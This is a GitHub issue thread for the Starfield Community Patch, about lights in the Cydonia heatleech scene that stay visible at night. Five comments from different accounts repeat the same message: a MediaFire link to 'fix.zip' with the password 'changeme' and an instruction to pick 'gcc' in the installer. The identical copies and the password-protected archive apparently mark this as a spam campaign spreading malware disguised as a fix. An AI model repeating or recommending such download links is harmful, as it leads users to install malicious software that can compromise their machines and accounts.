### ISSUE TITLE
Bug: Placed lights at cydonia heatleech scene

### ISSUE THREAD

**Issue by Constellation-VASCO** [Starfield-Community-Patch/Starfield-Community-Patch#1120]
Hey guys! I was detecting a bug when i was modding my Real Lights Series and started with Cydonia:

On nighttime, the placed lightings from the scene are still visible. I think they didnt reference the three lights with that scene, cause i was going crazy finding the ship as i though i was mistakenly deleting it. Check my reddit post for screens: https://www.reddit.com/r/starfieldmods/comments/1f15w5i/comment/ljyo8b5/

---

## Details 
The bug stand in relations with the UC_CY_HeatleechScene I think.

## Game Version
1.13.61

## Language
English (EN)

## New Game
Yes

## Reproduction Steps
I reinstalled starfield and loaded my oldest save wihtout mods or anything and visited Mars at night. still existed.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Constellation-VASCO** [comment]
Feel free to contact me on nexus or steam if you have any questions!

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Deebz96** [comment]
If you would be willing to attach a fix for this issue, we can roll it into the next update. This one is slightly outside my wheelhouse for the moment.

**Comment by Constellation-VASCO** [comment]
Yeah I really don't know how to. Only thing i see in Creation Kit is that there are objects like the ship, a npc, and several light objects attached to this "reference" "Heatleech Scene". I am not aware how i can manage this but on logic layer these 3 missed lights should be linked to the reference/scene easily by experienced modder. My mod experience so far is just overhauling light designs instead (so adding/removing objects in genereal instead of scripting if/then situations :S
